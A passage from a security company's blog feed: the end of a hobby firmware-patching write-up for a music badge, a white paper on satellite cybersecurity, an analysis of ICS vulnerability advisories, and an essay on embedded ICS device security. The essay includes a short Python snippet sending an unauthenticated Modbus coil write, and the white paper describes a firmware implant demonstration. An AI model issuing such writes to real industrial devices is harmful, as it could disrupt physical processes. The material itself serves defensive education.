    D = 2,
    D_SHARP = 3,
    E = 4,
    F = 5,
    F_SHARP = 6,
    G = 7,
    G_SHARP = 8,
    A = 9,
    A_SHARP = 11,
    B = 13,
    SAMPLE_1 = 10,
    SAMPLE_2 = 12,
    SAMPLE_3 = 14,
} note_bit_type;

#define NOTE(bit_idx) (0x1 << bit_idx)
#define CHORD(x, y, z) (NOTE(x) | NOTE(y) | NOTE(z))
				
			

Then, we could store the correct sequence as a constant and iterate over that. The correct sequence can be found in memory (in the octave-offset representation explained in the earlier Payload section) at address 0x1000dac8 (thanks again to reteps for finding this). Converted to our C enums:

				
					const note_bit_type note_sequence[] = {
    G, E, D, C, // C@><
    D, E, G, E, // >@C@
    D, C, D, E, // ><>@
    G, E, G, A, // C@CE
    E, A, G, E, // @EC@
    D, C, G, E, // ><C@
    D, C, D, E, // ><>@
    G, E, D, C, // C@><
    D, E, D, E, // >@>@
    G, E, G, A, // C@CE
    E, A, B, G_SHARP, // @EGD
    F_SHARP, E, // B@
};
				
			

Then to write the note:

				
					note_bit_type next_note_bit = note_sequence[seq_i];
notes_held_bitmap |= NOTE(next_note_bit);

				
			

Starting playing the sequence

Initially, we had the sequence play in a loop forever, as soon as the “Play” menu came up.

 

This got a bit annoying. We had already figured out a few other inputs we could use to trigger the sequence, and settled on playing all three samples at once while a specific instrument is selected; switching out of that instrument stops the sequence. This was much better for our sanity. We also added some initialization code for the counters, just to be sure they start at 0, and wrote a specific magic value to one of our scratch variables to track whether the state was initialized. A saner alternative would have been to find the initialization/startup code and hook into that, but this was easier.

				
					if (instrument != AUTOPLAY_INSTRUMENT){
    state = 0x0;
    return;
}

int all_3_samples_held = CHORD(SAMPLE_1, SAMPLE_2, SAMPLE_3);

if (state != 0xed){
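    // 0xed is the arbitrary magic value marking the sequence as triggered;
    // the masked XOR below is zero only when all three sample bits are set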
    if (!((notes_held_bitmap & all_3_samples_held) ^ all_3_samples_held)){
        counter = 0;
        seq_i = 0;
        state = 0xed;
    }
    else{
        return;
    }
}
   

				
			

We arbitrarily chose the violin as the autoplay instrument.

Closing Thoughts

This was good fun and an exercise in using OFRAK “recreationally.” We are, of course, partial to OFRAK, but it was great to script everything in Python and have access to a library of very helpful binary analysis and patching functionality.

 

Some future additions that could be done on this badge FW modification:

 

  • Making the autoplayer a separate “instrument” so it shows up on the instrument select screen. It would be a neat trick, but you’d have to stop the badge from thinking it’s an actual instrument and trying to play sounds that don’t exist (there appear to be jump tables for each instrument)
  • Making multiple new instruments for different pre-set tracks
  • Recording sequences of notes as new pre-set tracks at runtime
  • Using the various drawing functions to draw pictures according to the notes played, like a music visualizer

 

All of these would require rather significant additional space, so we would need a way to extend the firmware for sure. Sit tight for an OFRAK Modifier for that!

 

Some sticking points we noticed with OFRAK got us thinking:

 

  • It bothered us (aesthetically and practically) that we were defining functions and data in two places: the “extern” declarations in source/header, and the LinkableSymbol that actually defined the value. It seems more practical and convenient to define functions along with their types in one place, perhaps pulling these straight from Ghidra, and have OFRAK create both the declaration and the definition without any further user input (see the sketch after this list).
  • Managing data sections (both R and RW) through the PatchFromSourceModifier API is a bit impractical. This can always be tricky with PatchMaker, but the Modifier’s API abstracts away the guts that you unfortunately need to dig into to get things working smoothly. For example, we originally tried to use LLVM instead of GNU, but LLVM stubbornly insisted that extern pointers to data had to first be loaded as an indirect pointer from the .rodata section, which pointed to an address in the .bss section, where the address of the variable would hopefully be contained. GNU was happy to just load the variable address directly from the .rodata section. Managing an additional section was more effort than switching toolchains, which is a testament to interoperability and modularity in PatchMaker but a flaw in PatchFromSourceModifier.
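On the first point, here is a minimal sketch of what that might look like. This is a hypothetical helper, not an existing OFRAK API: it assumes the LinkableSymbol, LinkableSymbolType, and InstructionSetMode names from the patch script above, plus the FREE_SCRATCH_SPACE constant, and derives both the LinkableSymbol list and the C extern declarations from a single definition:

from dataclasses import dataclass

@dataclass(frozen=True)
class PatchVariable:
    # Hypothetical one-stop definition of a patch variable
    name: str
    address: int
    c_type: str = "int"

PATCH_VARIABLES = [
    PatchVariable("counter", FREE_SCRATCH_SPACE),
    PatchVariable("seq_i", FREE_SCRATCH_SPACE + 0x8),
    PatchVariable("state", FREE_SCRATCH_SPACE + 0x10),
]

def to_linkable_symbols(variables):
    # The list that would feed the UpdateLinkableSymbolsModifierConfig shown earlier
    return [
        LinkableSymbol(v.address, v.name, LinkableSymbolType.RW_DATA, InstructionSetMode.NONE)
        for v in variables
    ]

def to_extern_header(variables):
    # The extern declarations to #include from the C patch source
    return "\n".join(f"extern {v.c_type} {v.name};" for v in variables)

Generating the header at patch-build time would keep the two views in sync, and pulling name, address, and type straight out of Ghidra’s symbol table would remove even that single manual definition.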

 

Perhaps these will become pull requests you’ll see landing in core OFRAK shortly 🙂

 

Hope you enjoyed our work!  Maybe next you can build something else cool on top of the badge!

 

— Edward Larson & Jacob Strieb

 

Embedded Systems and Aerospace & Satellite Cybersecurity https://redballoonsecurity.com/embedded-systems-and-aerospace-satellite-cybersecurity/ https://redballoonsecurity.com/embedded-systems-and-aerospace-satellite-cybersecurity/#respond Wed, 01 Jun 2022 19:06:35 +0000 https://redballoonsecurity.com/?p=6981

Red Balloon Security White Paper

 

Defending From Within: Why Embedded Systems Are Essential to Achieving Space and Satellite Cybersecurity

Table of Contents:

  • Executive Summary
  • State of Cybersecurity in Space and Satellite Systems
    • The Global Landscape
    • Shaping a Safer Future
  • Red Balloon Security Investigations
    • CyberLEO 2022
    • Defend from Within: Symbiote Embedded Defense for Satellite Base Station Systems
    • NyanSat (https://nyan-sat.com) Binary Analysis and Exploration with FRAK
  • About Red Balloon Security
  • Red Balloon Security Offerings: Defend From Within
  • Contact Details

Executive Summary:

Ensuring the cybersecurity of ground stations, communications, and satellite vehicles is one of the most pressing challenges facing the private and public sectors. At a time of tremendous industry growth, it is more imperative than ever that we secure every segment of satellite systems and protect the personnel who depend on their accuracy, speed, and reliability.

 

The Ukrainian conflict has amplified serious questions about cybersecurity at every link in aerospace deployments. Now is the time for manufacturers, governments, and security providers to align with each other on solutions.

 

Red Balloon Security identifies three messages for shaping a safer future for space infrastructure:

 

1. Don’t miss the threat on the ground for the threat in space.


2. End users, manufacturers and security experts must collaborate on advanced solutions.

3. We must expand regulations to cover embedded systems.

 

Red Balloon Security has built up satellite and aerospace expertise over more than a decade of governmental and commercial engagements, in which we’ve assessed all types of equipment and helped government and industry decision-makers to anticipate and defend against the most serious cyber threats facing our satellite fleets. Our core embedded defense technology, Symbiote, has been deployed by DARPA, the DoD, and DHS, while our experts have contributed to red vs. blue simulations that highlight insecurity in satellite systems — and frequently propose solutions for safer space deployments.

 

There is still time to get aerospace security right, but the longer commercial and government interests wait, the harder it will be to rectify insecure architecture in satellite constellations. To paraphrase a sage from another era, “The best time to plant a tree was 20 years ago.” The next best time to address satellite cybersecurity is now.

State of Cybersecurity in Space and Satellite Systems

The Global Landscape

 

A residual effect of war in Ukraine is that cybersecurity is no longer a sideshow in aerospace, if 2022 space-related trade events are any indication. The conflict has raised awareness and concerns about the security of every link in aerospace deployments. Now is the time for manufacturers, governments, and security providers to align with each other on solutions.

 

Although the initial Russian invasion did not lead to the unrestrained cyber warfare that many people feared, a February 2022 disruption of a satellite network, which was not restricted to Ukraine, added urgency to many conversations. However, while the space industry understands satellite security and puts a lot of thought into it, it often lacks actionable next steps. The prevailing sentiment is that bad cyber actors have a head start on government agencies, operators, and equipment manufacturers.

 

This is problematic on two levels. Aerospace and satellite deployments are mission-critical and indispensable to the growth of many industries and technologies. At the same time, their attack surfaces have also greatly expanded — and without corrective action, security controls will be bolted onto future designs in an insufficient manner, rather than being built into them with foresight and efficiency.

 

The projected expansion of satellite deployments provides a unique opportunity to build mature security solutions into government and commercial deployments. We can expect an exponential increase in the number of Low Earth Orbit (LEO) satellites, as well as the emergence of small GEO satellites. This means more methods of connectivity, in space and on the ground, and a corresponding increase in opportunities for cyber malfeasance. But it also gives system architects the chance to capitalize on a decade’s worth of advances in cybersecurity technology, and to launch hardened, new constellations — provided we take a proactive approach to investment and collaboration.

 

Shaping a Safer Future

 

To help stimulate innovation and partnership, we identify three messages that should gain traction in 2022 and beyond:

 

1. Don’t miss the threat on the ground for the threat in space

Much attention has been paid to the threat of signal jamming or spoofing directed at satellite vehicles, which could lead to collisions or disruption of internet access in vital industry or governmental communications. But dangerous cyberattacks can focus on any part of a satellite network, including multiple devices that support satellite base stations and communications hubs. These assets on the ground can be accessed remotely, or in many cases physically, since they often are in isolated locations with variable perimeter security.

 

The objective of such attacks could also be the compromise or destruction of land-based equipment, as seems to be the case with the Viasat/KA-SAT attack, which temporarily disabled thousands of modems in several countries. Viasat’s analysis indicates the attacker began by exploiting a VPN device misconfiguration, gained remote access to a segment of the company network, and then sent management commands to thousands of modems at once, which overwrote flash memory and temporarily knocked the modems offline. It was a consequential strike that required no knowledge or exploits of a satellite vehicle.

 

2. End users, manufacturers and security experts must collaborate on advanced solutions

The impressive growth of commercial aerospace and satellite deployments complicates efforts to elevate industry security standards. As more business opportunities are built out and scaled, we can expect more players to enter the space, and more reliance on increasingly complex supply chains — both of which will elevate cyber risk. The days in which a few established private sector enterprises supplied technology and devices to a few dedicated clients, each of which was a branch of the government, are past.

 

Given this new reality, collaboration around industry standards will be essential to satellite network security. As more companies move in, it’s critical that established players advocate and fight for high-security standards that reflect the current threat climate. This can help establish benchmarks that elevate current standards, promote accountability, and incorporate security solutions for devices and systems.

 

The U.S. government will remain hugely influential, due to the power of its purse, decades of aerospace engagement, and history of collaboration with industry leaders. It can actually incentivize commercial suppliers to invest in advanced security controls by demanding them — and it most certainly should do so.

 

There is also a need for rigorous testing of new security deployments in controlled environments, such as red vs. blue exercises. These can provide training for military operators and opportunities for them to work with device manufacturers to integrate security technology with new and legacy satellite communications equipment. Ideally, this training should include commercial equipment manufacturers, equipment operators, and security experts. Securing space will require a highly collaborative, multi-disciplinary approach: No one body of experts has all the answers.

 

3. We must expand regulations to cover embedded systems

Government regulators have had timely responses to emerging satellite communications network threats. In the first months of 2022, CISA issued two alerts (one in collaboration with the FBI) for service providers and customers, while NIST pushed to update its guidelines for satcom cybersecurity risk management.

 

Although welcome, these documents focus on network-based security controls, which are essential but not sufficient to meet current threats. Like other recent directives, they do not adequately address security challenges in embedded systems and the devices that support them; the guidance that does exist centers on network controls, which alone cannot provide a comprehensive security posture.

 

For decades, security policy has exempted special purpose and embedded systems as being too difficult to secure while maintaining real-time performance. It is time for policy to catch up with technology and mandate the levels of security controls that are now feasible for aerospace, and many other industries.

Red Balloon Security Investigations

As a leading cybersecurity research and technology firm, Red Balloon Security has undertaken multiple investigations of satellite system devices, communications protocols, and their security postures. The company has disclosed multiple vulnerabilities to device manufacturers, and has worked closely with teams in the U.S. Department of Homeland Security, Air Force and Department of Defense to develop security hardening solutions across satellite systems.

 

CyberLEO 2022

Red Balloon Security’s CEO and founder, Dr. Ang Cui, joined the advisory board of CyberLEO in 2022 to promote security solutions across commercial and US government satellite systems. CyberLEO 2022 focused on the urgent need to protect expanding satellite constellations from existing and evolving cybersecurity threats.

 

During the conference, Red Balloon Security presented several demonstrations, one of which included the injection of a firmware implant directly into the firmware binary of a commercial satellite modem. The firmware implant was designed to be stealthy and to activate during the modem’s boot process. It created a communication channel and acted as a pivot point from the ground station to the space assets. In particular, the implant enabled communication with a reaction wheel inside a mock CubeSat, and enabled telnet control for Command and Control (C2) operations, which included sending malicious commands that arbitrarily controlled the CubeSat’s navigation.

 

These explorations underscored the importance of holistic platform security for all devices involved in a satellite system, on the ground and in space. Such firmware implants, if they go undetected, have severe consequences for ground control and space equipment: compromised firmware can result in loss of equipment functionality, destruction of the equipment, and even loss of life in the event of orchestrated space collisions with manned missions.

ICS-CERT vulnerability analysis https://redballoonsecurity.com/ics-cert-vulnerability-analysis/ https://redballoonsecurity.com/ics-cert-vulnerability-analysis/#respond Tue, 26 Apr 2022 19:50:34 +0000 https://redballoonsecurity.com/?p=6734

ICS-CERT vulnerability analysis

What's in a vulnerability: Evaluating host-based defense through recent ICS device data

We analyzed data from the national vulnerability database to assess the applicability of on-device security features

Whether they are discovered by independent researchers, manufacturers, or cyber attackers, device vulnerabilities traditionally have been remedied via patching. Although reactive, patching’s effectiveness is easy enough to quantify: It is effective if the vulnerability no longer exists after the patch is applied.

 

A host-based defense is another matter. It comprises technology that monitors a device’s function and issues alerts or remediations whenever malicious activity is detected. It does not remediate vulnerabilities: Rather, it defends against exploitation of an undiscovered or unremediated vulnerability. 

 

As such, the host-based security apparatus’s effectiveness can be harder to evaluate than patching. There are several methods, including listing the controls enforced, mapping to a threat model, red teaming, or measuring the effectiveness of host-based defenses against current or likely near-term attacks in the field (“proven in use”).

 

And while “proven in use” evidence has obvious value, it is difficult to gather for host-based defenses (such as RBS’s Symbiote technology). The publicly available data on actual attacks is sparse, and there is good reason to believe it is often obscured or not released publicly.

 

Vulnerability disclosures provide some insights, as we can at least determine what types of attacks might be mounted against each vulnerability class. But no matter how severe it is, a device vulnerability only indicates a plausible means for a cyber attacker to gain a foothold on a device. Furthermore, the ongoing reality of zero-day vulnerabilities, which are not detected until a cyber incident is underway, requires a different way of thinking about, and defending against, attacks.

 

One way is to extrapolate from vulnerability data. This approach depends on several assumptions:

  1. A regularly replenished, published list of vulnerabilities discovered on embedded devices.
  2. An unknown set of zero-day vulnerabilities that are not reflected in the published data.
  3. A population of attackers with sufficient sophistication to base attacks either on known or zero-day vulnerabilities.

Host-based security is predicated on the need to move beyond a continuous cycle of patching. Vulnerabilities will always exist, and while the reactive patching process will continue to play a role in device security, it simply is not capable of deflecting a subset of threats that are not discovered or can’t be patched. 

 

To evaluate host-based defense, we’ve used raw data published by the U.S. Cybersecurity & Infrastructure Security Agency (CISA) on its ICS-CERT Advisories page. The entries include a rating based on the Common Vulnerability Scoring System (CVSS); a risk evaluation; affected products; a Common Weakness Enumeration (CWE); and a vulnerability overview/analysis. The analysis is the key component that allows us to determine whether or not an attack launched against a given vulnerability would be detected if a host-based defense technology were in place on the device.

Why host-based defense analysis is relevant

Host-based security can benefit end users and original equipment manufacturers in terms of total cost of ownership and reputation:

  • While expeditious patching of vulnerabilities is always recommended, host-based defense can provide protection even when patching is delayed, in addition to protecting against exploitable, but unknown, firmware vulnerabilities.

 

  • As an active method, host-based security can prevent end users from being compromised by zero-day exploits or within a window between the vulnerability discovery and patch application. It can also help OEMs reduce cost by combining patches and aligning updates.

 

  • Detection can benefit OEMs and end users by generating forensic data, which can help identify capability gaps in current technology, facilitate upgrades, and form methods of preventing future attacks.

Quantitative findings:

Assessments of a host-based defense’s ability to detect and/or prevent attacks exploiting any particular vulnerability rely on the ICS Advisory’s risk evaluation, which highlights the class of weakness (CWE) to which the vulnerability belongs, and the consequences of the vulnerability’s exploit (e.g., remote code execution, buffer overflow, denial of service). 

 

We reviewed approximately six months of ICS-CERT vulnerability disclosures. Of these, 37% were found in firmware.


Of the vulnerabilities with CVSS categorizations of “high” or “critical,” almost 57% (157 of 276) are firmware-based:[1]

In our analysis, a host-based defense would be effective protection against 63% of these vulnerabilities, including all CVSS severity levels:

However, for the “high” or “critical” CVSS firmware vulnerabilities, a host-based defense could remove an attacker’s opportunity to reliably execute code or modify memory as part of an attack. It would be applicable or likely applicable to 74% of these vulnerabilities, and would reduce the CVSS rating for roughly one out of three, with an average decrease of 2.3 points on the CVSS scale.

 

More importantly, applying a host-based defense can reduce the severity of compromises to device integrity, confidentiality, and availability. Per the CVSS vectors, a successful exploit would give an attacker full visibility into the device’s functionality, the ability to manipulate files, and the ability to deny access to legitimate users.

Our analysis found strong or universal host-based defense applicability with improper input validation, improper command injection, and classic buffer overflow:

This is a breakdown that demonstrates host-based defense applicability to specific vulnerability types relevant to embedded systems.

Notes about the analysis and CISA advisories

The information included in device vulnerability advisories is not consistent. In some, there is an abundance of information and definite statements about the type of exploit an attacker could undertake. When, for example, a vulnerability is described as “buffer overflow that leads to remote code execution,” it is clear that host-based defense would be effective. 

 

In contrast, with a vulnerability that allows “privilege escalation through a website and execution of OS-level commands,” host-based defense will be effective in some, but not all cases. If the commands being executed are meant to run on the device, host-based detection and response will not be remediative. It will be, however, if the commands should not be allowed when the device is deployed, but were incidentally included in the OS or firmware. 

 

This accounts for the subset of results identified by the “host defense maybe” portion of the graphs above. Even in a highly selective analysis that does not consider these results, there is a strong case for the utility of host-based defenses for embedded devices and systems.

Where we expect to see significant change in our findings:

The percentage of disclosed vulnerabilities for which host-based defense will be applicable is almost certain to rise in the future, as vulnerabilities related to relatively simple engineering fixes (e.g. presence of hard-coded passwords) are resolved. More severe vulnerabilities associated with complex device controls and firmware can lead to remote code execution and other exploits, particularly given that attackers are increasingly targeting this level.

Additional context:

Data from Claroty’s H1 2022 ICS Risk & Vulnerability Report provides useful analysis that frames the value of host-based firmware defense. Here are some key findings:

  • 31% of the report’s disclosed vulnerabilities have no fix, or only a partial remediation. Of these, almost half were firmware-based vulnerabilities.

 

  • 25% of the vulnerabilities affected either the supervisory control or basic control ICS level. An attacker who is able to exploit vulnerabilities at this level will be in a strong position to access lower levels of the process, including mission-critical and safety devices. 

 

  • Of the basic control vulnerabilities, Claroty judged that 53% could lead to code execution, and 91% of those vulnerabilities could be exploited remotely. 

 

  • 29 affected products were “end-of-life” products that the manufacturer no longer supports — and 22 of these had firmware vulnerabilities. “End-of-life” status does not guarantee the end user will soon replace the device; some may choose to maintain it because it is still functional, expensive to replace, or too difficult to take offline. For these, Claroty concludes that “the only solution is to mitigate (where possible) until replacement,” while also noting firmware updates can take months or even years to release. These cases present another strong argument for host-based defense that does not depend on patching and updates. 

 

  • The firmware vulnerabilities in this report are concentrated in OT systems and networks:

Source: Claroty ICS Risk & Vulnerability Report, H2 2021

Vulnerabilities will persist: Host-based defense is an essential component of the solution

Our analysis highlights two important realities: vulnerabilities in OT systems are common, and those systems remain at risk due to the reactive approach to patching.

 

Of course, not every vulnerability represents a serious or immediate attack opportunity. Attackers must work to formulate an exploit based on a published vulnerability, and also figure out how to reach the device in the field to run the exploit. Exploiting an unpublished or undiscovered vulnerability is even more challenging, as the attacker will need to undertake their own research and discovery process.

 

Also, we are not suggesting that the current cycle of discovery, disclosure and remediation is inherently flawed or in need of replacement. Given the quantity of published vulnerabilities and the uncountable number still undiscovered, DevOps and patching will be part of the security landscape for the foreseeable future. 

 

But it is important to recognize that DevOps and patching can be a slow process, especially with firmware. It is not uncommon for the creation, testing and release of a firmware patch to require several months. Updates in safety certifications take even longer. Relying solely on these remediation mechanisms will not suffice; while still valuable, they must be augmented by technology that can respond in real time to zero-day attacks on undiscovered or unpatched vulnerabilities.

 

The findings in this analysis demonstrate the value of implementing security controls that detect anomalous behavior at the firmware level as a necessary extension of the reactive, “whack-a-mole” patching defense. These host-based defenses can provide a critical next step in device protection, and help to include embedded devices in a true “defense in depth” system. 

 

We encourage you to review the accompanying data, and to learn more about how our firmware hardening, protection, and monitoring solutions can help your products and industrial systems achieve modern, proactive security.



[1] CVSS scores depend on a rubric that considers multiple variables, including the distance an attacker can be from a target; whether or not the attacker can perform the attack at will; whether or not any user interaction is required; the number of privileges that are required; whether or not systems beyond the vulnerable component can be impacted; the amount of information that may be disclosed; the amount of information that can be modified; and the degree of disruption to availability. For a detailed description of the scoring, see https://www.first.org/cvss/user-guide.


Why embedded device security is essential to ICS systems https://redballoonsecurity.com/why-embedded-device-security-is-essential-to-ics-systems/ https://redballoonsecurity.com/why-embedded-device-security-is-essential-to-ics-systems/#respond Mon, 04 Apr 2022 15:45:42 +0000 https://redballoonsecurity.com/?p=5385

Why embedded device security is essential to ICS systems

Protections at the device level are not a replacement for security controls in OT systems and networks. They’re a necessary extension of them.

Embedded devices in industrial control systems (ICS) operate within an increasingly complex array of systems, networks, and protocols. The complexity is only increasing as end users require more insight into how ICS operate, and push for more connectivity between controls and the individual devices that underpin the systems’ performance. This has had the effect of complicating ICS’ hierarchical communication structure and introducing new cyber threats with the potential to target devices that operate below the control level.

 

As with IT systems, where increased connectivity exposed endpoints such as PCs and network infrastructure, ICS have expanded into multiple layers, each of which has security controls designed to protect against cyberattacks that are increasingly common and capable of targeting devices on the operational technology (OT) side.

 

We first witnessed this security evolution in information technology (IT) systems at the enterprise level. Over the course of two decades, IT systems expanded and incorporated a vast number of new endpoints, and a correspondingly complex new system of connection points, networks, and communication protocols. The proliferation of endpoints and connections led to increased cyber threats and successful intrusions, which ultimately provided the incentive to harden and expand security controls throughout the IT environment.

 

A similar evolution has occurred in control rooms over the last 10 years. Devices became more common, more connected, and subsequently more vulnerable. Each year there are more documented attacks targeting endpoints such as SCADA servers and historians, engineering workstations, HMIs, and communications infrastructure. By now, it is accepted that security controls at this ICS level should be as robust as those applied to IT systems.

 

We are now at the point where the next expansion of security must cover the endpoints closest to the ICS physical processes. This includes devices such as actuators, sensors, valves, robotics, and safety equipment, as well as human machine interfaces (HMIs), programmable logic controllers (PLCs), fieldbus I/O, and other controllers that operate outside the control room. Here too, some assumptions about the insularity of these endpoints have persisted: they are too hard to reach and exploit; they are not sufficiently valuable as attack targets; controls at higher levels of the ICS technology stack offer sufficient protection.

 

To explain why these assumptions are no longer valid, it is helpful to view the modern ICS system in the context of current ICS cyber threats. It’s also imperative to recognize that cyberattacks can work through even the most robust sequence of security layers or bypass them through exploitation of permissions. Equally important is the recognition that embedded devices at the lowest ICS levels can be accessed via the control room, and that persistent compromise of such devices is not only possible, but not particularly difficult to execute.

[Figure: Purdue Model of the ICS stack]

Attacks that reach the bottom of the ICS stack are rare, but typically much more damaging than attacks at the higher levels.

Security at all ICS layers will remain essential, and controls at the IT, DMZ, and control room levels will continue to deflect the large majority of ICS attack attempts. But the next essential step — which remains far from complete — is to create a truly in-depth ICS security structure by pushing controls onto the devices themselves. To understand why, it helps to review what security at other layers accomplishes — and what it can miss.

ICS security is an evolutionary process

It’s hardly surprising that the concept of on-device security is still gaining purchase, since only a few years ago most of the ICS layers below the enterprise level were thought to be air-gapped, so hard to access as to make endpoint security controls unnecessary, or not worth the disruption those controls would cause once implemented.

 

The air-gap premise was plausible only as long as the control-room level generally was not connected to the enterprise network, public Internet and wireless networks. However, attacks such as Stuxnet demonstrated that air-gapping was not an impenetrable defense, and the lack of connectivity became an impediment once control room-level endpoints and their collected data became valuable to working groups on the enterprise level.

 

At this point, there were strong arguments for creating or strengthening firewalls, the DMZ, and robust communications protocols. But there was still resistance to putting security directly onto endpoints at the control room level.

 

Five years ago, control room endpoints typically did not run antivirus, whitelisting, or other digital security tools, and they could not receive patches or updates, for fear this would disrupt plant or system operations. These concerns were not entirely unfounded, as it did require engineering adjustments to make controls such as antivirus work effectively within SCADA systems and other control assets.

 

But as systems improved, software update signing became the standard, and security controls were calibrated to function without drawing down too much processing power. There also has been a corresponding rise in the number of cyberattacks on the control room level to solidify the case for endpoint protection. Today, in most ICS deployments, control room devices are outfitted with a level of security that equals that of endpoints on the enterprise level.

ICS security, layer on layer

ICS deployments are often proprietary, and their security controls may be distinctive. The Purdue Model, first created in the 1990s, is an imperfect representation of most ICS technology-security stacks; it does not reflect technologies and trends that have made ICS more complex over time, such as increasing use of remote connectivity, more channels between the enterprise and control room layers, and expanding access for external parties and vendors. Despite this, our discussion can benefit from an adapted and simplified version of this model, as seen below:

[Image: adapted and simplified model of ICS security layers]

Endpoints need to be secured at every layer, but the quality of security controls is not consistent layer on layer.[1]
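
For readers following along without the figure, the adapted hierarchy can be summarized in a few lines; the asset examples are illustrative, drawn from the discussion in this article rather than from any one deployment.

# Simplified, adapted Purdue-style hierarchy used in this discussion.
# Asset examples are illustrative, not exhaustive.
ICS_LAYERS = {
    "enterprise": ["business servers", "corporate PCs"],
    "DMZ": ["jump servers", "patch and update servers"],
    "control room": ["SCADA servers", "historians", "HMIs", "engineering workstations"],
    "control network": ["PLCs", "protection relays", "fieldbus I/O"],
    "device network": ["sensors", "actuators", "valves", "safety equipment"],
}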

As with the enterprise level in most organizations, endpoints at the ICS control level should be (and typically are) protected by a wide range of safeguards around the perimeter, within the network and on the endpoints themselves. The importance of physical, digital, cloud and cybersecurity controls at this level has been a given since criminals began to target it.

Security controls for endpoints at the enterprise level and the control room level have achieved rough equivalency.

Existing ICS protections are not enough to isolate the embedded device layer

The higher up the stack a security control sits, the more attacks it is likely to deflect. Each control takes pressure off the lower levels and off the monitoring and investigation capabilities of the ICS, leaving resources available for detecting threats directed lower in the technology stack.

 

Attacks that reach embedded devices at the lowest ICS level — controllers, sensors, safety equipment and manufacturing machinery are just a few examples — are low-frequency events. But given these devices’ mission-critical purpose, or their position in hazardous deployments, such attacks carry the highest potential for catastrophic outcomes.

 

Means by which the end devices can be exposed include:

  • Attacks that exploit permissions. These may originate with a person working below the majority of upper-level security controls, who has access to a network that runs next to or very close to mission-critical devices. This may be an operator or an engineer with malicious intent, or one whose credentials or access has been compromised and unwittingly used to transport an attack via accepted communications protocols.

 

  • Supply chain compromises, in which a device sent out for repair or being maintained on site, or one receiving updates, is corrupted at the firmware level.

 

  • Intrusions such as successful phishing compromises that jump the IT/OT divide and access the control room, and from there access the devices using approved communication channels.

 

  • Intrusions perpetrated by operators who deliberately bypass approved communication paths to access devices directly (either for convenience or malicious purposes).

[Image: potential ICS attack vectors]

Attacks on embedded devices can have multiple points of entry.

Vulnerabilities or undocumented access paths on devices represent a different category of threat, since they originate in device engineering. Like many other vulnerabilities, they are sometimes used to provide engineers with access to device controls. But as with any other convenience, a vulnerability or access path can be exploited by a bad actor who wants to evade security controls and authorization requirements to upload malicious firmware or send commands.

 

Additionally, some communications must pass through all ICS levels, and these channels can be used for malicious purposes as well as normal ones. Communications and operations that can expose the lowest level of devices include:

  • Updates to antivirus, software and firmware, which need to travel down the technology stack (starting at the DMZ).

 

  • Operators or vendors who may use remote connections to the ICS. Ideally, these remote comms will terminate in a jump server in the DMZ, but often they connect to PCs in the control network or — even worse — directly to the devices. In a worst-case scenario, the remote access server could be located in the control network or device network, allowing direct access to these levels and devices, which will bypass the security controls of upper levels.

 

  • Operators who may deploy unsigned software due to convenience or time constraints; this software is downloaded from external sources or manually carried into the system, including down to the device network. Unsigned or maliciously signed software allows malware to be introduced into the system.

 

  • Operators who may deploy software with signatures that are faked or stolen.

As with other legitimate operations or engineering features, attackers can exploit approved communications protocols (Modbus, Profinet, etc.) to travel between the control network and the device network.
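
A short sketch makes the point concrete: classic Modbus/TCP carries no authentication, so any host with network reach to a device’s TCP port 502 can issue writes. The device address and coil number below are hypothetical (192.0.2.x is a reserved documentation range).

# Sketch of why protocol reach equals control on classic Modbus/TCP:
# there are no credentials, sessions or signatures on a write request.
# Target address and coil number are hypothetical.
from pymodbus.client import ModbusTcpClient

client = ModbusTcpClient("192.0.2.10", port=502)
if client.connect():
    result = client.write_coil(0, True)  # accepted if the device supports the function code
    print("write rejected" if result.isError() else "write accepted")
    client.close()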

The current insecure state of devices on the lowest levels

In ICS, the security provided by controls around or on the shell of the devices is typically not as robust as that provided by controls higher in the system. When attackers are able to circumvent or defeat the higher controls, there is typically little meaningful defense at the lowest critical layers.

This effectively leaves embedded device security at the same level of protection we saw in control room endpoints five to 10 years ago. As it was then, conventional thinking presumes a few conditions:

  • Embedded devices are unreachable. This is refuted by supply chain risks, insider errors or threats, and carefully orchestrated attacks that succeed in worming through some or all of the other layers of ICS security.

 

  • Embedded devices are not desirable targets. Since these devices are essential to the operation of electrical grids, manufacturing plants, chemical processing, and other critical and/or hazardous ICS, they should be considered valid targets for cyberattacks.

 

  • Embedded device security is too complicated, or will interfere with the primary function of the device. Red Balloon Security’s work, and that of other leading cybersecurity companies, has demonstrated that these devices, like any other endpoint, can operate with robust security hardening their shells while running concurrently with their essential functionality.

Recent examples of ICS attacks that impacted the control network layer

While the layers of security provide necessary and, in most cases, effective defense that justifies investment, there are relevant examples of attacks that simply bypassed entire layers or defeated them through compromise of legitimate communications protocols. Notable examples include:

  • The 2015 Ukraine grid attack, in which attackers first spear-phished workers and then compromised the log-in credentials those workers used to access the SCADA system remotely. The attackers then erased the firmware of the serial-to-Ethernet gateway devices that carried communications to the substations, and sent commands to end devices at the control network level or above (including UPSs).

 

  • The 2016 CRASHOVERRIDE attack, which most likely began with credential capture on the IT system and the re-use of those credentials to log into machines at the ICS level, and ultimately led to access of SCADA-connected protection relays, which were then put into a diagnostic mode that disabled their protection algorithms.[2]

 

  • The 2017 Triton attack, which successfully manipulated the firmware of safety instrumented systems by targeting the engineering workstation rather than the HMI or SCADA systems.

In each of these attacks, normal communications protocols were exploited, which in turn allowed the attackers to access devices at the lowest levels of the ICS.

 

While in some cases the attackers may have exploited flawed access controls or protocols, each of these events demonstrates the feasibility of a dedicated, deliberate campaign to learn how a system operates and use established communications channels to deliver malicious payloads.

 

As such, they are irrefutable proof that devices on the lower levels of ICS can — and will — be subject to cyberattacks. This in turn demonstrates the need for monitoring and protection at the device level.

The case for on-device security

Loading security controls directly onto embedded devices is not the first step in ICS protection. The protections built into other layers are necessary to deflect the large majority of malicious intrusions and mitigate most human errors.

 

But the subset of legitimate threats that can directly access control networks and communications protocols is large enough to warrant an investment in on-device security, particularly given the increasing connectivity of ICS, the prevalence of remote access, and the potential damages that would result from device-level compromise.

 

Security on or next to these devices can also help prevent lower-impact events, such as an incorrect configuration download, unauthorized device tampering or well-intentioned but faulty device maintenance. Basic security features around the devices can also mitigate the effects of attacks higher in the technology stack that increase network traffic to the point of overload, which can lead to device failure.

On-device defense, such as Red Balloon’s Symbiote, is designed to fill the embedded endpoint security gap by protecting the application level, the operating system, the firmware and the secure boot process.

Host-based defenses can include firmware hardening through binary reduction and randomization, and runtime protection that can close the ICS security circuit by blocking on-device attacks involving memory corruption, process spawning or forking, malicious code execution, and firmware corruption or erasure. This brings protection down to the hardware layer and provides a means to proactively alert operators to anomalous behavior in real time.
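
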